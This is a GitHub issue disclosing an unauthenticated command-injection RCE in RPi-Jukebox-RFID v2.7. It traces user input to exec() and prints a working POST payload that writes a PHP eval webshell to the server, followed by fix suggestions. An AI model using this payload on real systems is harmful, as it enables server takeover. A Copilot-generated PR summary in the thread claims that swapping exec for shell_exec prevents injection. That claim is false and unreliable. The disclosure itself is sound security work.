-
Notifications
You must be signed in to change notification settings - Fork 400
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
🐛 | RPi-Jukebox-RFID V2.7_RCE_1 #2396
Comments
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC: Poc_fixed
Data
Here is Data without url encoding for ease of understanding:
Manual verification |
Thanks for bringing that up. If you want you could also open a PR which would fix these issues. |
Thank you for your reply. Recently, I have been focusing on reporting vulnerabilities in multiple web applications, so I am unable to help you fix this issue in the short term. How does this POC workFor this series of issues, it is essentially because the part of the code that executes commands is introduced without checking the data submitted by the user. Taking this RCE vulnerability as an example:
The value of When the commands executed by the program can be controlled by the user, it is easy to produce unexpected effects. For hackers, they are committed to uploading some Trojans to gain control of the server. The effect of this PoC is to make the executed command look like the following:
It can be noted that the semicolon(;) in PoC enable the execution of multiple commands here, with the second command writing a webshell named shell.php to the file system ( How to fixBecause I don't have time to open a PR to fix these vulnerabilities in the short term,I am here to provide some fix suggestions:
I hope it can help you
|
Fix the Remote Code Execution (RCE) vulnerability in `htdocs/inc.setWlanIpMail.php` by sanitizing and validating user input. See #2396 * **Sanitization and Validation:** - Add validation for the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`. - Add sanitization for the email address using `htmlspecialchars`. - Replace the `exec` function with `shell_exec` to prevent command injection. * **Unit Tests:** - Add `tests/htdocs/inc/SetWlanIpMailTest.php` to validate the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`. - Add unit tests to sanitize the email address using `htmlspecialchars`. - Add unit tests to ensure the `exec` function is replaced with `shell_exec`. --- For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/MiczFlor/RPi-Jukebox-RFID?shareId=XXXX-XXXX-XXXX-XXXX).
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\inc.setWlanIpMail.php
Source from Line 36 (
$_POST['WlanIpMailAddr']
).And then there are three check point ,which we should set
$_POST['WlanIpMailYN'] = 1
to bypass.After bypass three check point, the source(tainted) pass to
$WlanIpMailAddr
andexec($exec);
(Line 52) without another check.Poc
POST /htdocs/inc.setWlanIpMail.php
Data:
WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22hello
Here is Data without url encoding for ease of understanding:
WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell.php ; echo "hello
Manual verification
The attacker can then easily connect to this webshell(/htdocs/shell.php)
Logs
No response
Configuration
No response
More info
No response
The text was updated successfully, but these errors were encountered: